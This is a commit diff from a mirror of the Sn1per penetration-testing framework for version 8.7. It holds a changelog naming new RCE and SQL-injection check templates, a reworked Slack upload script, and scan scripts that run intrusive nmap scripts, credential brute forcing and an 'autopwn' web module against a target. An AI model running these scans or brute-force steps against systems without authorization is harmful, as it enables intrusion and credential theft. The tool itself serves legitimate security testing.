mirror of https://github.com/1N3/Sn1per.git
New sc0pe templates, updated Slack API integration, updated wordlists and misc changes for v8.7
This commit is contained in:
parent
c236a48aa8
commit
7adb5b3998
14
CHANGELOG.md
14
CHANGELOG.md
|
|
@ -1,5 +1,17 @@
|
|||
## CHANGELOG:
|
||||
* v8.7 - Fixed/added Nessus integration (Pro only)
|
||||
* v8.7 - Updated web file bruteforce lists
|
||||
* v8.7 - Added updated Slack API integration/notifications
|
||||
* v8.7 - Added Magento 2.3.0 SQL Injection sc0pe template
|
||||
* v8.7 - Added CVE-2020-15920 - Unauthenticated RCE at Mida eFramework sc0pe template
|
||||
* v8.7 - Added CVE-2019-7192 - QNAP Pre-Auth Root RCE sc0pe template
|
||||
* v8.7 - Added CVE-2020-10204 - Sonatype Nexus Repository RCE sc0pe template
|
||||
* v8.7 - Added CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection sc0pe template
|
||||
* v8.7 - Added CVE-2020-2140 - Jenkin AuditTrailPlugin XSS sc0pe template
|
||||
* v8.7 - Added CVE-2020-7209 - LinuxKI Toolset 6.01 Remote Command Execution sc0pe template
|
||||
* v8.7 - Added CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution sc0pe template
|
||||
* v8.7 - Added Sitemap.xml Detected sc0pe template
|
||||
* v8.7 - Added Robots.txt Detected sc0pe template
|
||||
* v8.7 - Added AWS S3 Public Bucket Listing sc0pe template
|
||||
* v8.7 - Fixed logic error in stealth mode recon scans not running
|
||||
* v8.7 - Added CVE-2020-7048 - WP Database Reset 3.15 Unauthenticated Database Reset
|
||||
* v8.7 - Fixed F- detection in Wordpress Sc0pe templates
|
||||
|
|
|
|||
18
bin/slack.sh
18
bin/slack.sh
|
|
@ -1,17 +1,17 @@
|
|||
#!/bin/bash
|
||||
# Slack API Integration script for Sn1per
|
||||
# By @xer0dayz - https://xerosecurity.com
|
||||
#
|
||||
|
||||
source /usr/share/sniper/sniper.conf
|
||||
source /root/.sniper.conf
|
||||
source /root/.sniper_api_keys.conf
|
||||
|
||||
SLACK_API_TOKEN=$(grep SLACK_API_TOKEN ~/.sniper.conf | cut -d\" -f2)
|
||||
SLACK_CHANNEL="sn1per-professional"
|
||||
MESSAGE="$1"
|
||||
|
||||
if [ "$MESSAGE" == "postfile" ]; then
|
||||
FILENAME="$2"
|
||||
curl -v -F "file=@$FILENAME" "https://slack.com/api/files.upload?token=$SLACK_API_TOKEN&channels=%23$SLACK_CHANNEL&filename=$FILENAME&pretty=1" 2> /dev/null > /dev/null
|
||||
curl -F "file=@$FILENAME" -F "initial_comment=$FILENAME" -F "channels=$SLACK_CHANNEL" -H "Authorization: Bearer $SLACK_API_TOKEN" https://slack.com/api/files.upload 2> /dev/null > /dev/null
|
||||
else
|
||||
curl -G --data-urlencode "text=$MESSAGE" \
|
||||
--data-urlencode "token=$SLACK_API_TOKEN" \
|
||||
--data-urlencode "channel=#$SLACK_CHANNEL" \
|
||||
-i -s -k -X $'GET' \
|
||||
-H $'Host: slack.com' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
|
||||
$'https://slack.com/api/chat.postMessage' 2> /dev/null > /dev/null
|
||||
curl -X POST -H 'Content-type: application/json' --data "{\"text\":\"$MESSAGE\"}" $SLACK_WEBHOOK_URL 2> /dev/null > /dev/null
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -80,7 +80,6 @@ if [[ "$MODE" = "airstrike" ]]; then
|
|||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
fi
|
||||
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -3,8 +3,8 @@ if [[ "$AUTOBRUTE" = "0" ]]; then
|
|||
echo -e "$OKRED SKIPPING BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
else
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-bruteforce.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -23,8 +23,8 @@ else
|
|||
echo "$CRACKED" > $LOOT_DIR/output/cracked-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo ""
|
||||
mv $LOOT_DIR/scans/running-$TARGET-bruteforce.txt $LOOT_DIR/scans/finished-$TARGET-bruteforce.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_BRUTEFORCE" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/credentials/brutex-$TARGET.txt"
|
||||
|
|
|
|||
|
|
@ -50,8 +50,8 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
|
||||
echo "sniper -t $TARGET -m $MODE $args" >> $LOOT_DIR/scans/running-$TARGET-$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "sniper -t $TARGET -m $MODE $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
echo -e "${OKBLUE}HOST:$RESET $TARGET"
|
||||
|
|
@ -98,8 +98,8 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets-all-presorted.txt
|
||||
|
||||
mv $LOOT_DIR/scans/running-$TARGET-$MODE.txt $LOOT_DIR/scans/finished-$TARGET-$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 2> /dev/null
|
||||
RUNNING_TASKS=$(wc -l $LOOT_DIR/scans/tasks-running.txt 2> /dev/null)
|
||||
|
||||
i=$((i+1))
|
||||
|
|
@ -131,7 +131,7 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
diff $LOOT_DIR/nmap/livehosts-sorted.old $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.diff 2> /dev/null
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]] && [[ -s "$LOOT_DIR/nmap/livehosts-sorted.diff" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Host status change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Host status change detected on $WORKSPACE (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/livehosts-sorted.diff"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Host status change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/nmap/livehosts-sorted.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications.txt
|
||||
|
|
|
|||
|
|
@ -18,8 +18,8 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
fi
|
||||
args="$args --noreport -m fullportonly"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-$MODE.txt
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
|
|
@ -64,8 +64,8 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-$MODE.txt $LOOT_DIR/scans/finished-$TARGET-$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
if [[ ${#HOST_UP} -ge 2 ]]; then
|
||||
|
|
@ -98,6 +98,7 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -3,7 +3,7 @@
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DOWNLOADING ALL JAVASCRIPT FILES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
egrep --binary-files=text "\.js" /usr/share/sniper/loot/workspace/127.0.0.1/web/spider-127.0.0.1.txt | egrep -v '.json|.jsp'
|
||||
egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt | egrep -v '.json|.jsp'
|
||||
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt | egrep -v '.json|.jsp' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -i 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -iv 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - https://$a" && FILENAME=$(echo "https://$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
|
|
|
|||
|
|
@ -47,7 +47,7 @@ if [[ "$MODE" = "massweb" ]]; then
|
|||
echo -e "$OKRED __________________________________________________________"
|
||||
echo -e "$RESET"
|
||||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
#echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
|
|
@ -55,7 +55,7 @@ if [[ "$MODE" = "massweb" ]]; then
|
|||
fi
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
#echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -19,35 +19,13 @@ if [[ "$MODE" = "masswebscan" ]]; then
|
|||
mkdir $WORKSPACE_DIR/notes 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/reports 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/output 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/vulnerabilities/ 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/scans/ 2> /dev/null
|
||||
fi
|
||||
args="$args -m webscan --noreport --noloot"
|
||||
TARGET="$a"
|
||||
args="$args -t $TARGET"
|
||||
echo -e "$OKRED |"
|
||||
echo -e "$OKRED | |"
|
||||
echo -e "$OKRED | -/_\-"
|
||||
echo -e "$OKRED -/_\- ______________(/ . \)______________"
|
||||
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
|
||||
echo -e "$OKRED <> \___/ <> <>"
|
||||
echo -e "$OKRED "
|
||||
echo -e "$OKRED ||"
|
||||
echo -e "$OKRED <>"
|
||||
echo -e "$OKRED ||"
|
||||
echo -e "$OKRED <>"
|
||||
echo -e "$OKRED ||"
|
||||
echo -e "$OKRED || BIG"
|
||||
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
|
||||
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
|
||||
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
|
||||
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
|
||||
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
|
||||
echo -e "$OKRED | ||. | | | ||| |||||"
|
||||
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
|
||||
echo -e "$OKRED | ||. | | | ||| |||||"
|
||||
echo -e "$OKRED __________________________________________________________"
|
||||
echo -e "$RESET"
|
||||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
|
|
@ -55,7 +33,6 @@ if [[ "$MODE" = "masswebscan" ]]; then
|
|||
fi
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -43,28 +43,17 @@ if [[ ! -z $WORKSPACE ]]; then
|
|||
fi
|
||||
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo "$TARGET normal `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-normal.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-normal.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks-unsorted.txt 2> /dev/null
|
||||
mv -f $LOOT_DIR/scans/tasks-unsorted.txt /dev/null $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/${TARGET}-${MODE}.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [normal] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [normal] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING DNS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -481,7 +470,7 @@ else
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -Pn -p 80 -sV -v --script-timeout 90 --script=http-adobe-coldfusion-apsa1301,http-apache-server-status,http-aspnet-debug,http-auth-finder,http-auth,http-avaya-ipoffice-users,http-awstatstotals-exec,http-axis2-dir-traversal,http-backup-finder,http-barracuda-dir-traversal,http-brute,http-cakephp-version,http-chrono,http-config-backup,http-cookie-flags,http-cors,http-cross-domain-policy,http-csrf,http-date,http-default-accounts,http-devframework,http-dlink-backdoor,http-dombased-xss,http-domino-enum-passwords,http-drupal-enum-users,http-drupal-enum,http-errors,http-feed,http-fetch,http-fileupload-exploiter,http-form-brute,http-form-fuzzer,http-frontpage-login,http-generator,http-git,http-gitweb-projects-enum,http-google-malware,http-grep,http-headers,http-huawei-hg5xx-vuln,http-icloud-findmyiphone,http-icloud-sendmsg,http-iis-short-name-brute,http-iis-webdav-vuln,http-internal-ip-disclosure,http-joomla-brute,http-ls,http-majordomo2-dir-traversal,http-method-tamper,http-methods,http-mobileversion-checker,http-ntlm-info,http-open-proxy,http-open-redirect,http-passwd,http-php-version,http-phpmyadmin-dir-traversal,http-phpself-xss,http-proxy-brute,http-put,http-qnap-nas-info,http-rfi-spider,http-robots.txt,http-robtex-reverse-ip,http-robtex-shared-ns,http-security-headers,http-server-header,http-shellshock,http-sitemap-generator,http-sql-injection,http-stored-xss,http-svn-enum,http-svn-info,http-title,http-tplink-dir-traversal,http-trace,http-traceroute,http-unsafe-output-escaping,http-userdir-enum,http-vhosts,http-virustotal,http-vlcstreamer-ls,http-vmware-path-vuln,http-vuln-cve2006-3392,http-vuln-cve2009-3960,http-vuln-cve2010-0738,http-vuln-cve2010-2861,http-vuln-cve2011-3192,http-vuln-cve2011-3368,http-vuln-cve2012-1823,http-vuln-cve2013-0156,http-vuln-cve2013-6786,http-vuln-cve2013-7091,http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129,http-vuln-cve2014-3704,http-vuln-cve2014-8877,http-vuln-cve2015-1427,http-vuln-cve2015-1635,http-vuln-cve2017-1001000,http-vuln-cve2017-5638,http-vuln-cve2017-5689,http-vuln-cve2017-8917,http-vuln-misfortune-cookie,http-vuln-wnr1000-creds,http-waf-detect,http-waf-fingerprint,http-webdav-scan,http-wordpress-brute,http-wordpress-enum,http-wordpress-users,http-xssed,/usr/share/nmap/scripts/vulners,http-default-accounts --script-args http-default-accounts.fingerprintfile=/usr/share/sniper/bin/http-default-accounts-fingerprints-nndefaccts.lua $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80
|
||||
nmap -Pn -p 80 -sV -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts --script-args http-default-accounts.fingerprintfile=/usr/share/sniper/bin/http-default-accounts-fingerprints-nndefaccts.lua $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null
|
||||
fi
|
||||
|
|
@ -499,8 +488,28 @@ else
|
|||
cd $LOOT_DIR
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py http://$TARGET:80
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/normal_webporthttp.sh
|
||||
|
||||
cd $INSTALL_DIR
|
||||
PORT="80"
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
|
||||
fi
|
||||
|
||||
if [[ -z "$port_110" ]];
|
||||
|
|
@ -777,7 +786,7 @@ else
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -sV -Pn -p 443 -v --script-timeout 90 --script=http-adobe-coldfusion-apsa1301,http-apache-server-status,http-aspnet-debug,http-auth-finder,http-auth,http-avaya-ipoffice-users,http-awstatstotals-exec,http-axis2-dir-traversal,http-backup-finder,http-barracuda-dir-traversal,http-brute,http-cakephp-version,http-chrono,http-config-backup,http-cookie-flags,http-cors,http-cross-domain-policy,http-csrf,http-date,http-default-accounts,http-devframework,http-dlink-backdoor,http-dombased-xss,http-domino-enum-passwords,http-drupal-enum-users,http-drupal-enum,http-errors,http-feed,http-fetch,http-fileupload-exploiter,http-form-brute,http-form-fuzzer,http-frontpage-login,http-generator,http-git,http-gitweb-projects-enum,http-google-malware,http-grep,http-headers,http-huawei-hg5xx-vuln,http-icloud-findmyiphone,http-icloud-sendmsg,http-iis-short-name-brute,http-iis-webdav-vuln,http-internal-ip-disclosure,http-joomla-brute,http-ls,http-majordomo2-dir-traversal,http-method-tamper,http-methods,http-mobileversion-checker,http-ntlm-info,http-open-proxy,http-open-redirect,http-passwd,http-php-version,http-phpmyadmin-dir-traversal,http-phpself-xss,http-proxy-brute,http-put,http-qnap-nas-info,http-rfi-spider,http-robots.txt,http-robtex-reverse-ip,http-robtex-shared-ns,http-security-headers,http-server-header,http-shellshock,http-sitemap-generator,http-sql-injection,http-stored-xss,http-svn-enum,http-svn-info,http-title,http-tplink-dir-traversal,http-trace,http-traceroute,http-unsafe-output-escaping,http-userdir-enum,http-vhosts,http-virustotal,http-vlcstreamer-ls,http-vmware-path-vuln,http-vuln-cve2006-3392,http-vuln-cve2009-3960,http-vuln-cve2010-0738,http-vuln-cve2010-2861,http-vuln-cve2011-3192,http-vuln-cve2011-3368,http-vuln-cve2012-1823,http-vuln-cve2013-0156,http-vuln-cve2013-6786,http-vuln-cve2013-7091,http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129,http-vuln-cve2014-3704,http-vuln-cve2014-8877,http-vuln-cve2015-1427,http-vuln-cve2015-1635,http-vuln-cve2017-1001000,http-vuln-cve2017-5638,http-vuln-cve2017-5689,http-vuln-cve2017-8917,http-vuln-misfortune-cookie,http-vuln-wnr1000-creds,http-waf-detect,http-waf-fingerprint,http-webdav-scan,http-wordpress-brute,http-wordpress-enum,http-wordpress-users,http-xssed,/usr/share/nmap/scripts/vulners,http-default-accounts --script-args 